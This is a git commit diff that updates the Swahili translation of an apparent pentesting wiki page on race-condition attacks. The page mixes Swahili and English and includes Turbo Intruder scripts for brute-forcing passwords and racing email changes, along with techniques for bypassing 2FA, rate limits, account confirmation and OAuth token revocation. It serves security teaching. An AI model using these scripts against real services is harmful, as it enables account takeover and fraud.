Translated ['', 'src/pentesting-web/race-condition.md', 'src/pentesting-

2025-10-10 18:36:50 +00:00 · 2025-09-29 14:21:27 +00:00 · 2025-09-29 14:21:27 +00:00 · 0714e2b46c
commit 0714e2b46c
parent 0c0c2421b5
3 changed files with 276 additions and 142 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@ -837,9 +837,14 @@
  - [WWW2Exec - GOT/PLT](binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md)
  - [WWW2Exec - \_\_malloc_hook & \_\_free_hook](binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md)
 - [Common Exploiting Problems](binary-exploitation/common-exploiting-problems.md)
- [Linux kernel exploitation - toctou](binary-exploitation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md)
 - [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
- [iOS Exploiting](binary-exploitation/ios-exploiting.md)
+- [iOS Exploiting](binary-exploitation/ios-exploiting/README.md)
+  - [ios CVE-2020-27950-mach_msg_trailer_t](binary-exploitation/ios-exploiting/CVE-2020-27950-mach_msg_trailer_t.md)
+  - [ios CVE-2021-30807-IOMobileFrameBuffer](binary-exploitation/ios-exploiting/CVE-2021-30807-IOMobileFrameBuffer.md)
+  - [ios Corellium](binary-exploitation/ios-exploiting/ios-corellium.md)
+  - [ios Heap Exploitation](binary-exploitation/ios-exploiting/ios-example-heap-exploit.md)
+  - [ios Physical UAF - IOSurface](binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.md)
+

 # 🤖 AI
 - [AI Security](AI/README.md)
--- a/src/pentesting-web/race-condition.md
+++ b/src/pentesting-web/race-condition.md
@ -3,56 +3,56 @@
 {{#include ../banners/hacktricks-training.md}}

 > [!WARNING]
-> Kwa kupata uelewa wa kina wa mbinu hii angalia ripoti ya asili katika [https://portswigger.net/research/smashing-the-state-machine](https://portswigger.net/research/smashing-the-state-machine)
+> Ili kupata uelewa wa kina wa teknik hii angalia ripoti ya awali katika [https://portswigger.net/research/smashing-the-state-machine](https://portswigger.net/research/smashing-the-state-machine)

-## Kuimarisha Mashambulizi ya Race Condition
+## Enhancing Race Condition Attacks

-Kikwazo kikuu katika kutumia race conditions ni kuhakikisha kwamba maombi mengi yanashughulikiwa kwa wakati mmoja, kwa **tofauti ndogo sana katika nyakati zao za usindikaji—kwa kawaida, chini ya 1ms**.
+Kizuizi kikuu katika kutumia race conditions ni kuhakikisha kuwa requests nyingi zinashughulikiwa kwa wakati mmoja, kwa **tofauti ndogo sana katika nyakati zao za usindikaji—kwa uzuri, chini ya 1ms**.

-Hapa unaweza kupata mbinu za Kuisawazisha Maombi:
+Hapa unaweza kupata mbinu baadhi za kusawazisha maombi:

-#### HTTP/2 Shambulizi la Pakiti Moja dhidi ya HTTP/1.1 Usawazishaji wa Byte wa Mwisho
+#### HTTP/2 Single-Packet Attack vs. HTTP/1.1 Last-Byte Synchronization

- **HTTP/2**: Inasaidia kutuma maombi mawili kupitia muunganisho mmoja wa TCP, kupunguza athari za jitter za mtandao. Hata hivyo, kutokana na tofauti za upande wa seva, maombi mawili yanaweza kutotosha kwa matumizi ya kudumu ya exploit ya race condition.
- **HTTP/1.1 'Usawazishaji wa Byte wa Mwisho'**: Inaruhusu kutuma sehemu nyingi za maombi 20-30 kabla, ikizuia kipande kidogo, ambacho kitatumwa pamoja, kufikia kuwasili kwa wakati mmoja kwenye seva.
+- **HTTP/2**: Inaunga mkono kutuma requests mbili juu ya connection moja ya TCP, kupunguza athari ya network jitter. Hata hivyo, kutokana na tofauti upande wa server, requests mbili zinaweza zisitoshe kwa exploit ya race condition ya mara kwa mara.
+- **HTTP/1.1 'Last-Byte Sync'**: Inaruhusu kutuma sehemu nyingi za 20-30 requests mapema, ukizuia kipande kidogo, ambacho kisha kinatumwa pamoja, kufanikisha kufika kwa wakati mmoja kwenye server.

-**Maandalizi ya Usawazishaji wa Byte wa Mwisho** yanajumuisha:
+Maandalizi ya Last-Byte Sync ni pamoja na:

-1. Kutuma vichwa na data ya mwili bila byte ya mwisho bila kumaliza mtiririko.
-2. Kusimamisha kwa 100ms baada ya kutuma awali.
-3. Kuzima TCP_NODELAY ili kutumia algorithm ya Nagle kwa kuunganisha fremu za mwisho.
-4. Kupiga simu ili kuimarisha muunganisho.
+1. Kutuma headers na body data bila bajeti ya mwisho bila kumaliza stream.
+2. Kusitisha kwa 100ms baada ya send ya kwanza.
+3. Kuzima TCP_NODELAY ili kutumia Nagle's algorithm kwa kuunganisha frames za mwisho.
+4. Kufanya ping ili kuchemsha connection.

-Kutuma fremu zilizoshikiliwa baadaye kunapaswa kusababisha kuwasili kwao katika pakiti moja, inayoweza kuthibitishwa kupitia Wireshark. Mbinu hii haitumiki kwa faili za statiki, ambazo kawaida hazihusiki katika mashambulizi ya RC.
+Kutuma baadaye kwa frames zilizozuiliwa kunapaswa kusababisha kuzifikia kwa packet moja, kuthibitishwa kwa Wireshark. Mbinu hii haifanyi kazi kwa static files, ambazo kwa kawaida hazihusiki na RC attacks.

-### Kurekebisha kwa Mifumo ya Seva
+### Adapting to Server Architecture

-Kuelewa usanifu wa lengo ni muhimu. Seva za mbele zinaweza kuelekeza maombi tofauti, kuathiri wakati. Kuimarisha muunganisho wa upande wa seva kwa maombi yasiyo na maana kunaweza kuleta kawaida katika wakati wa maombi.
+Kuelewa muundo wa lengo ni muhimu. Front-end servers zinaweza kupitisha requests tofauti, kuathiri timing. Kuchemsha connections upande wa server kwa requests zisizo na maana kunaweza kukanusha tofauti za timing.

-#### Kushughulikia Kufunga Kulingana na Kikao
+#### Handling Session-Based Locking

-Mifumo kama vile handler ya kikao ya PHP inachambua maombi kwa kikao, ambayo inaweza kuficha udhaifu. Kutumia tokeni tofauti za kikao kwa kila ombi kunaweza kuondoa tatizo hili.
+Frameworks kama PHP's session handler hufanya serialize requests kwa session, jambo ambalo linaweza kuficha udhaifu. Kutumia session tokens tofauti kwa kila request kunaweza kuepuka tatizo hili.

-#### Kushinda Mipaka ya Kiwango au Rasilimali
+#### Overcoming Rate or Resource Limits

-Ikiwa kuimarisha muunganisho hakufanyi kazi, kuanzisha ucheleweshaji wa mipaka ya kiwango au rasilimali za seva za wavuti kwa makusudi kupitia maombi mengi ya dummy kunaweza kuwezesha shambulizi la pakiti moja kwa kuleta ucheleweshaji wa upande wa seva unaofaa kwa race conditions.
+Ikiwa kuchemsha connection hakufanyi kazi, kusababisha kwa makusudi ucheleweshaji wa rate au resource limits kwa web servers kupitia flood ya dummy requests kunaweza kuwezesha single-packet attack kwa kuingiza ucheleweshaji upande wa server unaofaa kwa race conditions.

-## Mifano ya Shambulizi
+## Attack Examples

- **Tubo Intruder - shambulizi la pakiti moja la HTTP2 (1 mwisho)**: Unaweza kutuma ombi kwa **Turbo intruder** (`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`), unaweza kubadilisha katika ombi thamani unayotaka kujaribu nguvu kwa **`%s`** kama katika `csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s` na kisha chagua **`examples/race-single-packer-attack.py`** kutoka kwenye orodha:
+- **Tubo Intruder - HTTP2 single-packet attack (1 endpoint)**: Unaweza kutuma request kwa **Turbo intruder** (`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`), unaweza kubadilisha kwenye request thamani unayotaka brute force kwa **`%s`** kama katika `csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s` na kisha chagua **`examples/race-single-packer-attack.py`** kutoka kwenye drop down:

 <figure><img src="../images/image (57).png" alt=""><figcaption></figcaption></figure>

-Ikiwa unataka **kutuma thamani tofauti**, unaweza kubadilisha msimbo na huu unaotumia orodha ya maneno kutoka kwenye clipboard:
+If you are going to **send different values**, you could modify the code with this one that uses a wordlist from the clipboard:
 ```python
 passwords = wordlists.clipboard
 for password in passwords:
 engine.queue(target.req, password, gate='race1')
 ```
 > [!WARNING]
-> Ikiwa wavuti haisaidii HTTP2 (ni HTTP1.1 tu) tumia `Engine.THREADED` au `Engine.BURP` badala ya `Engine.BURP2`.
+> Ikiwa tovuti haitegemei HTTP2 (inatumia tu HTTP1.1), tumia `Engine.THREADED` au `Engine.BURP` badala ya `Engine.BURP2`.

- **Tubo Intruder - HTTP2 shambulio la pakiti moja (Mikondo kadhaa)**: Ikiwa unahitaji kutuma ombi kwa 1 mkingo na kisha mengi kwa mkingo mingine ili kuanzisha RCE, unaweza kubadilisha skripti ya `race-single-packet-attack.py` na kitu kama:
+- **Tubo Intruder - HTTP2 single-packet attack (Several endpoints)**: Ikiwa unahitaji kutuma ombi kwa 1 endpoint kisha nyingi kwa endpoints nyingine ili kusababisha RCE, unaweza kubadilisha script ya `race-single-packet-attack.py` kwa kitu kama:
 ```python
 def queueRequests(target, wordlists):
 engine = RequestEngine(endpoint=target.endpoint,
@ -83,16 +83,16 @@ engine.queue(confirmationReq, gate=currentAttempt)
 # send all the queued requests for this attempt
 engine.openGate(currentAttempt)
 ```
- Inapatikana pia katika **Repeater** kupitia chaguo jipya la '**Send group in parallel**' katika Burp Suite.
- Kwa **limit-overrun** unaweza kuongeza **ombio sawa mara 50** katika kundi.
- Kwa **connection warming**, unaweza **kuongeza** mwanzoni mwa **kundi** baadhi ya **ombio** kwa sehemu zisizo za static za seva ya wavuti.
- Kwa **delaying** mchakato **kati** ya processing **ombio moja na nyingine** katika hatua 2 za substates, unaweza **kuongeza ombio za ziada kati** ya ombio zote mbili.
- Kwa **multi-endpoint** RC unaweza kuanza kutuma **ombio** inayokwenda kwenye hali ya siri na kisha **ombio 50** mara baada yake ambayo **inatumia hali ya siri**.
+- Inapatikana pia katika **Repeater** kupitia chaguo jipya '**Send group in parallel**' katika Burp Suite.
+- Kwa **limit-overrun** unaweza tu kuongeza **same request 50 times** katika group.
+- Kwa **connection warming**, unaweza **add** katika **beginning** ya **group** baadhi ya **requests** kwa sehemu isiyo-static ya web server.
+- Kwa **delaying** mchakato **between** ku-processing **one request and another** katika hatua za 2 substates, unaweza **add extra requests between** requests zote mbili.
+- Kwa RC ya **multi-endpoint** unaweza kuanza kutuma **request** inayowaelekea **goes to the hidden state** na kisha **50 requests** mara tu baada yake ambazo **exploits the hidden state**.

 <figure><img src="../images/image (58).png" alt=""><figcaption></figcaption></figure>

- **Automated python script**: Lengo la script hii ni kubadilisha barua pepe ya mtumiaji huku ikithibitisha mara kwa mara hadi token ya uthibitisho ya barua pepe mpya ifike kwa barua pepe ya mwisho (hii ni kwa sababu katika msimbo ilikuwa inaonekana RC ambapo ilikuwa inawezekana kubadilisha barua pepe lakini uthibitisho ukatumwa kwa ile ya zamani kwa sababu ya variable inayonyesha barua pepe ilikuwa tayari imejaa na ya kwanza).\
-Wakati neno "objetivo" linapatikana katika barua pepe zilizopokelewa tunajua tumepokea token ya uthibitisho ya barua pepe iliyobadilishwa na tunamaliza shambulio.
+- **Automated python script**: Lengo la script hii ni kubadilisha email ya user wakati ukithibitisha mara kwa mara mpaka verification token ya email mpya ifike kwenye last email (hii ni kwa sababu katika code ilionekana RC ambapo ilikuwa inawezekana kubadilisha email lakini verification ikatumwa kwa ile ya zamani kwa sababu variable inayobainisha email ilikuwa tayari imejazwa na ile ya kwanza).\
+When the word "objetivo" is found in the received emails we know we received the verification token of the changed email and we end the attack.
 ```python
 # https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun
 # Script from victor to solve a HTB challenge
@ -217,21 +217,21 @@ h2_conn.close_connection()

 response = requests.get(url, verify=False)
 ```
-### Kuboresha Shambulio la Pakiti Moja
+### Kuboresha Single Packet Attack

-Katika utafiti wa awali, imeelezwa kwamba shambulio hili lina kikomo cha 1,500 bytes. Hata hivyo, katika [**post hii**](https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/), imeelezwa jinsi inavyowezekana kupanua kikomo cha 1,500-byte cha shambulio la pakiti moja hadi **65,535 B window limitation ya TCP kwa kutumia upasuwaji wa safu ya IP** (kugawanya pakiti moja kuwa pakiti nyingi za IP) na kuzituma kwa mpangilio tofauti, ambayo iliruhusu kuzuia kuunganishwa tena kwa pakiti hadi vipande vyote vifikie seva. Mbinu hii iliruhusu mtafiti kutuma maombi 10,000 katika takriban 166ms.
+Katika utafiti wa asili ilielezwa kwamba shambulio hili lina kikomo cha 1,500 bytes. Hata hivyo, katika [**this post**](https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/), ilielezwa jinsi inavyowezekana kupanua kikomo cha 1,500-byte cha single packet attack hadi **65,535 B window limitation of TCP by using IP layer fragmentation** (splitting a single packet into multiple IP packets) na kuvituma kwa mpangilio tofauti, kuruhusu kuzuia kuunganisha upya packet hadi fragments zote zifikie server. Mbinu hii iliruhusu mtafiti kutuma 10,000 requests kwa takriban 166ms.

-Kumbuka kwamba ingawa kuboresha hii kunafanya shambulio kuwa na uaminifu zaidi katika RC inayohitaji mamia/maelfu ya pakiti kufika kwa wakati mmoja, inaweza pia kuwa na vikwazo vya programu. Seva maarufu za HTTP kama Apache, Nginx na Go zina mipangilio ya `SETTINGS_MAX_CONCURRENT_STREAMS` ya 100, 128 na 250. Hata hivyo, zingine kama NodeJS na nghttp2 zina mipangilio isiyo na kikomo.\
-Hii inamaanisha kwamba Apache itazingatia tu muunganisho 100 wa HTTP kutoka kwa muunganisho mmoja wa TCP (ikizuia shambulio hili la RC).
+Kumbuka kwamba ingawa uboreshaji huu unafanya shambulio kuwa wa kuaminika zaidi katika RC unaohitaji mamia/maelfu ya packets kufika kwa wakati mmoja, inaweza pia kuwa na mipaka ya programu. Baadhi ya HTTP servers maarufu kama Apache, Nginx na Go zina setting kali ya `SETTINGS_MAX_CONCURRENT_STREAMS` kwa 100, 128 na 250. Hata hivyo, zingine kama NodeJS na nghttp2 zina bila kikomo.\
+Hii kwa msingi ina maana kwamba Apache itaangalia tu 100 HTTP connections kutoka kwa single TCP connection (kukandamiza RC attack hii).

-Unaweza kupata mifano kadhaa ukitumia mbinu hii katika repo [https://github.com/Ry0taK/first-sequence-sync/tree/main](https://github.com/Ry0taK/first-sequence-sync/tree/main).
+Unaweza kupata baadhi ya mifano ikitumia mbinu hii katika repo [https://github.com/Ry0taK/first-sequence-sync/tree/main](https://github.com/Ry0taK/first-sequence-sync/tree/main).

 ## Raw BF

-Kabla ya utafiti wa awali, hizi zilikuwa baadhi ya payloads zilizotumika ambazo zilijaribu kutuma pakiti haraka iwezekanavyo ili kusababisha RC.
+Kabla ya utafiti uliotajwa hapo juu hizi zilikuwa baadhi ya payloads zilizotumika ambazo zilijaribu tu kutuma packets haraka iwezekanavyo ili kusababisha RC.

- **Repeater:** Angalia mifano kutoka sehemu ya awali.
- **Intruder**: Tuma **ombile** kwa **Intruder**, weka **idadi ya nyuzi** kuwa **30** ndani ya **Menyu ya Chaguo** na, chagua kama payload **Null payloads** na tengeneza **30.**
+- **Repeater:** Check the examples from the previous section.
+- **Intruder**: Send the **request** to **Intruder**, set the **number of threads** to **30** inside the **Options menu and,** select as payload **Null payloads** and generate **30.**
 - **Turbo Intruder**
 ```python
 def queueRequests(target, wordlists):
@ -283,71 +283,71 @@ asyncio.run(main())

 ### Limit-overrun / TOCTOU

-Hii ni aina ya msingi zaidi ya hali ya mbio ambapo **vulnerabilities** zinazojitokeza katika maeneo ambayo **yanapunguza idadi ya nyakati unaweza kufanya kitendo**. Kama kutumia nambari ya punguzo sawa katika duka la mtandaoni mara kadhaa. Mfano rahisi sana unaweza kupatikana katika [**ripoti hii**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43) au katika [**bug hii**](https://hackerone.com/reports/759247)**.**
+Hii ni aina ya msingi kabisa ya race condition ambapo **vulnerabilities** ambazo **huonekana** katika maeneo yanayoweka **kikomo kwa idadi ya mara unazoweza kufanya kitendo**. Mfano rahisi ni kutumia msimbo wa punguzo ule ule kwenye duka la mtandaoni mara nyingi. Mfano rahisi unaweza kupatikana katika [**this report**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43) au katika [**this bug**](https://hackerone.com/reports/759247)**.**

-Kuna tofauti nyingi za aina hii ya shambulio, ikiwa ni pamoja na:
+Kuna aina nyingi za shambulio hili, zikiwemo:

- Kutumia kadi ya zawadi mara kadhaa
- Kutoa alama kwa bidhaa mara kadhaa
- Kutoa au kuhamasisha pesa zaidi ya salio la akaunti yako
- Kutumia suluhisho moja ya CAPTCHA tena
- Kupita kikomo cha kiwango cha kupambana na nguvu
+- Kutumia kadi ya zawadi mara nyingi
+- Kutoa tathmini kwa bidhaa mara nyingi
+- Kutoa au kuhamisha pesa zaidi ya salio la akaunti yako
+- Kutumia tena suluhisho moja la CAPTCHA
+- Bypassing an anti-brute-force rate limit

 ### **Hidden substates**

-Kuchochea hali ngumu za mbio mara nyingi kunahusisha kutumia fursa za muda mfupi kuingiliana na hali za mashine zilizofichwa au **zisizokusudiwa**. Hapa kuna jinsi ya kukabiliana na hili:
+Kufaida na race condition tata mara nyingi kunahitaji kuchukua fursa za muda mfupi za kuingiliana na hidden au **unintended machine substates**. Hivi ndivyo ya kuishughulikia:

-1. **Tambua Hali za Fichwa Zinazoweza**
- Anza kwa kubaini mwisho ambao hubadilisha au kuingiliana na data muhimu, kama vile profaili za watumiaji au michakato ya kurekebisha nywila. Lenga kwenye:
- **Hifadhi**: Prefer mwisho ambao hubadilisha data ya kudumu upande wa seva kuliko wale wanaoshughulikia data upande wa mteja.
- **Kitendo**: Tafuta operesheni zinazobadilisha data iliyopo, ambazo zina uwezekano mkubwa wa kuunda hali zinazoweza kutumiwa ikilinganishwa na zile zinazoongeza data mpya.
- **Keying**: Shambulio lililofanikiwa mara nyingi linahusisha operesheni zilizofungamanishwa na kitambulisho kimoja, mfano, jina la mtumiaji au token ya kurekebisha.
-2. **Fanya Uchunguzi wa Awali**
- Jaribu mwisho ulioainishwa kwa shambulio la hali ya mbio, ukitazama kwa mabadiliko yoyote kutoka kwa matokeo yanayotarajiwa. Majibu yasiyotarajiwa au mabadiliko katika tabia ya programu yanaweza kuashiria udhaifu.
-3. **Onyesha Udhaifu**
- Punguza shambulio hadi idadi ndogo ya maombi yanayohitajika kutumia udhaifu, mara nyingi ni mawili tu. Hatua hii inaweza kuhitaji majaribio mengi au automatisering kutokana na muda sahihi unaohusika.
+1. **Identify Potential Hidden Substates**
+- Anza kwa kubaini endpoints zinazobadilisha au kuingiliana na data muhimu, kama user profiles au password reset processes. Lenga kwenye:
+- **Storage**: TAFUTA endpoints zinazobadilisha data inayohifadhiwa upande wa server badala ya zile zinazosimamia data upande wa client.
+- **Action**: Tazama shughuli zinazobadilisha data iliyopo, ambazo zina uwezekano mkubwa wa kuunda hali zinazoweza kutumiwa ikilinganishwa na zile zinazoongeza data mpya.
+- **Keying**: Shambulio zenye mafanikio kwa kawaida zinahusisha operesheni zilizo key kwenye kiashiria kilekile, kwa mfano username au reset token.
+2. **Conduct Initial Probing**
+- Jaribu endpoints ulizotambua kwa race condition attacks, ukizingatia mabadiliko yasiyotarajiwa kutoka kwa matokeo yaliyotarajiwa. Majibu yasiyotarajiwa au mabadiliko katika tabia ya application yanaweza kuashiria vulnerability.
+3. **Demonstrate the Vulnerability**
+- Punguza shambulio hadi idadi ndogo ya requests zinazohitajika ili kutekeleza vulnerability, mara nyingi ni mbili tu. Hatua hii inaweza kuhitaji majaribio mengi au automation kutokana na timing sahihi inayohitajika.

 ### Time Sensitive Attacks

-Usahihi katika kuomba maombi unaweza kufichua udhaifu, hasa wakati mbinu zinazoweza kutabiriwa kama alama za muda zinapotumika kwa token za usalama. Kwa mfano, kuunda token za kurekebisha nywila kulingana na alama za muda kunaweza kuruhusu token sawa kwa maombi ya wakati mmoja.
+Usahihi wa timing ya requests unaweza kufichua vulnerabilities, hasa wakati mbinu zinazoonekana zinatumia timestamps kwa ajili ya security tokens. Kwa mfano, kuzalisha password reset tokens kulingana na timestamps kunaweza kuruhusu tokens sawa kwa requests zinazofanyika kwa wakati mmoja.

-**Ili Kutumia:**
+**To Exploit:**

- Tumia muda sahihi, kama shambulio la pakiti moja, kufanya maombi ya kurekebisha nywila kwa wakati mmoja. Token sawa zinaashiria udhaifu.
+- Tumia timing sahihi, kama single packet attack, kutuma concurrent password reset requests. Tokens zinapoonekana kuwa sawa zinaonyesha vulnerability.

-**Mfano:**
+**Example:**

- Omba token mbili za kurekebisha nywila kwa wakati mmoja na ulinganishe. Token zinazolingana zinaonyesha kasoro katika uzalishaji wa token.
+- Omba password reset tokens mbili kwa wakati mmoja na uzilinganishe. Tokens zinazolingana zinapendekeza kasoro katika uzalishaji wa tokens.

-**Angalia hii** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-exploiting-time-sensitive-vulnerabilities) **kujaribu hii.**
+**Check this** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-exploiting-time-sensitive-vulnerabilities) **to try this.**

 ## Hidden substates case studies

 ### Pay & add an Item

-Angalia hii [**PortSwigger Lab**](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation) kuona jinsi ya **kulipa** katika duka na **kuongeza** kipengee ambacho **hutaweza kulipia.**
+Angalia [**PortSwigger Lab**](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation) kuona jinsi ya **pay** katika duka na **add an extra** item ambayo **hautahitaji kulipia**.

 ### Confirm other emails

-Wazo ni **kuhakiki anwani ya barua pepe na kuibadilisha kuwa nyingine kwa wakati mmoja** ili kugundua ikiwa jukwaa linathibitisha ile mpya iliyobadilishwa.
+Wazo ni **kuthibitisha anwani ya barua pepe na kuibadilisha kwa nyingine kwa wakati mmoja** ili kugundua kama jukwaa linathibitisha ile mpya iliyobadilishwa.

 ### Change email to 2 emails addresses Cookie based

-Kulingana na [**utafiti huu**](https://portswigger.net/research/smashing-the-state-machine) Gitlab ilikuwa na udhaifu wa kuchukuliwa kwa njia hii kwa sababu inaweza **kutuma** **token ya uthibitisho wa barua pepe ya barua moja kwa barua nyingine**.
+Kulingana na [**this research**](https://portswigger.net/research/smashing-the-state-machine) Gitlab ilikuwa vulnerable kwa takeover kwa njia hii kwa sababu inaweza **send** the **email verification token of one email to the other email**.

-**Angalia hii** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-single-endpoint) **kujaribu hii.**
+**Check this** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-single-endpoint) **to try this.**

 ### Hidden Database states / Confirmation Bypass

-Ikiwa **kuandikwa tofauti 2** zinatumika ku **ongeza** **habari** ndani ya **database**, kuna sehemu ndogo ya muda ambapo **data ya kwanza tu imeandikwa** ndani ya database. Kwa mfano, wakati wa kuunda mtumiaji **jina la mtumiaji** na **nywila** vinaweza ku **andikwa** na **kisha token** ya kuthibitisha akaunti mpya iliyoundwa inaandikwa. Hii ina maana kwamba kwa muda mfupi **token ya kuthibitisha akaunti ni null**.
+Ikiwa **2 different writes** zinatumiwa **kuongeza** **information** ndani ya **database**, kuna muda mdogo ambapo **data ya kwanza pekee imeandikwa** ndani ya database. Kwa mfano, wakati wa kuunda user, **username** na **password** zinaweza **kuandikwa** na kisha **token** ya kuthibitisha akaunti mpya kuandikwa. Hii inamaanisha kwa muda mfupi **token to confirm an account is null**.

-Kwa hivyo **kujiandikisha akaunti na kutuma maombi kadhaa na token tupu** (`token=` au `token[]=` au toleo lolote jingine) ili kuthibitisha akaunti mara moja kunaweza kuruhusu **kuhakiki akaunti** ambayo hujaudhibiti barua pepe.
+Kwa hivyo **registering an account and sending several requests with an empty token** (`token=` or `token[]=` or any other variation) ili kuthibitisha akaunti mara moja inaweza kuruhusu c**onfirm an account** ambapo wewe huna udhibiti wa email.

-**Angalia hii** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction) **kujaribu hii.**
+**Check this** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction) **to try this.**

 ### Bypass 2FA

-Kifungu kinachofuata cha pseudo-code kina udhaifu wa hali ya mbio kwa sababu katika muda mfupi sana **2FA haitekelezwi** wakati kikao kinaundwa:
+The following pseudo-code is vulnerable to race condition because in a very small time the **2FA is not enforced** while the session is created:
 ```python
 session['userid'] = user.userid
 if user.mfa_enabled:
@ -355,22 +355,23 @@ session['enforce_mfa'] = True
 # generate and send MFA code to user
 # redirect browser to MFA code entry form
 ```
-### OAuth2 kudumu milele
+### OAuth2 uthabiti wa kudumu

-Kuna watoa huduma kadhaa wa [**OAUth**](https://en.wikipedia.org/wiki/List_of_OAuth_providers). Huduma hizi zitakuruhusu kuunda programu na kuthibitisha watumiaji ambao mtoa huduma amesajili. Ili kufanya hivyo, **mteja** atahitaji **kuruhusu programu yako** kufikia baadhi ya data zao ndani ya **mtoa huduma wa OAUth**.\
-Hivyo, hadi hapa ni kuingia kwa kawaida na google/linkedin/github... ambapo unapata ukurasa ukisema: "_Programu \<InsertCoolName> inataka kufikia taarifa zako, je, unataka kuiruhusu?_"
+Kuna several [**OAUth providers**](https://en.wikipedia.org/wiki/List_of_OAuth_providers). Huduma hizi zinakuwezesha kuunda application na authenticate watumiaji ambao provider amejiandikisha. Ili kufanya hivyo, **client** itahitaji **permit your application** kupata baadhi ya data zao ndani ya **OAUth provider**.\
+Hivyo, hadi hapa ni login ya kawaida na google/linkedin/github... ambapo utaonyeshwa ukurasa unaosema: "_Application \<InsertCoolName> wants to access you information, do you want to allow it?_"

-#### Hali ya Mbio katika `authorization_code`
+#### Race Condition in `authorization_code`

-**Tatizo** linaonekana unapokubali na moja kwa moja kutuma **`authorization_code`** kwa programu mbaya. Kisha, programu hii **inatumia Hali ya Mbio katika mtoa huduma wa OAUth ili kuunda zaidi ya AT/RT moja** (_Authentication Token/Refresh Token_) kutoka kwa **`authorization_code`** ya akaunti yako. Kimsingi, itatumia ukweli kwamba umekubali programu kufikia data zako ili **kuunda akaunti kadhaa**. Kisha, ikiwa **utakoma kuruhusu programu kufikia data zako, jozi moja ya AT/RT itafutwa, lakini zingine zitabaki kuwa halali**.
+Tatizo linaonekana unapokubali na mara moja kutumwa `authorization_code` kwa application hasidi. Kisha, application hii inatumia Race Condition katika OAUth service provider ili kuzalisha zaidi ya AT/RT moja (_Authentication Token/Refresh Token_) kutoka kwa `authorization_code` kwa akaunti yako. Kwa msingi, itafanya matumizi ya kwamba umemruhusu application kufikia data yako ili **kuunda akaunti nyingi**. Kisha, ukisitekuruhusu application kutekeleza upatikanaji wa data yako jozi moja ya AT/RT itaondolewa, lakini zingine zitaendelea kuwa halali.

-#### Hali ya Mbio katika `Refresh Token`
+#### Race Condition in `Refresh Token`

-Mara tu unapokuwa **umepata RT halali** unaweza kujaribu **kuitumia vibaya ili kuunda AT/RT kadhaa** na **hata kama mtumiaji anafuta ruhusa** kwa programu mbaya kufikia data zake, **RT kadhaa bado zitakuwa halali.**
+Mara tu unapopata RT halali unaweza kujaribu kuitumia vibaya (abuse) kuzalisha AT/RT kadhaa; na hata mtumiaji atakapofuta ruhusa za application hasidi kufikia data yake, RT kadhaa zitaendelea kuwa halali.

-## **RC katika WebSockets**
+## **RC in WebSockets**

-Katika [**WS_RaceCondition_PoC**](https://github.com/redrays-io/WS_RaceCondition_PoC) unaweza kupata PoC katika Java kutuma ujumbe wa websocket kwa **paraleli** ili kutumia **Hali za Mbio pia katika Web Sockets**.
+- Katika [**WS_RaceCondition_PoC**](https://github.com/redrays-io/WS_RaceCondition_PoC) utaona PoC kwa Java ya kutuma ujumbe za websocket kwa **parallel** ili kutumia Race Conditions pia kwenye Web Sockets.
+- Kwa Burp’s WebSocket Turbo Intruder unaweza kutumia engine ya **THREADED** kuanzisha muunganisho nyingi za WS na kutuma payloads kwa parallel. Anza na mfano rasmi na tunza `config()` (thread count) kwa concurrency; mara nyingi hii ni ya kuaminika zaidi kuliko batching kwenye muunganisho mmoja wakati wa kupigana (racing) hali ya server‑side kupitia WS handlers. Tazama [RaceConditionExample.py](https://github.com/d0ge/WebSocketTurboIntruder/blob/main/src/main/resources/examples/RaceConditionExample.py).

 ## Marejeo

@ -380,5 +381,8 @@ Katika [**WS_RaceCondition_PoC**](https://github.com/redrays-io/WS_RaceCondition
 - [https://portswigger.net/research/smashing-the-state-machine](https://portswigger.net/research/smashing-the-state-machine)
 - [https://portswigger.net/web-security/race-conditions](https://portswigger.net/web-security/race-conditions)
 - [https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/](https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/)
+- [WebSocket Turbo Intruder: Unearthing the WebSocket Goldmine](https://portswigger.net/research/websocket-turbo-intruder-unearthing-the-websocket-goldmine)
+- [WebSocketTurboIntruder – GitHub](https://github.com/d0ge/WebSocketTurboIntruder)
+- [RaceConditionExample.py](https://github.com/d0ge/WebSocketTurboIntruder/blob/main/src/main/resources/examples/RaceConditionExample.py)

 {{#include ../banners/hacktricks-training.md}}
--- a/src/pentesting-web/websocket-attacks.md
+++ b/src/pentesting-web/websocket-attacks.md
@ -1,20 +1,20 @@
-# WebSocket Attacks
+# WebSocket Mashambulizi

 {{#include ../banners/hacktricks-training.md}}

-## What are WebSockets
+## WebSockets ni nini

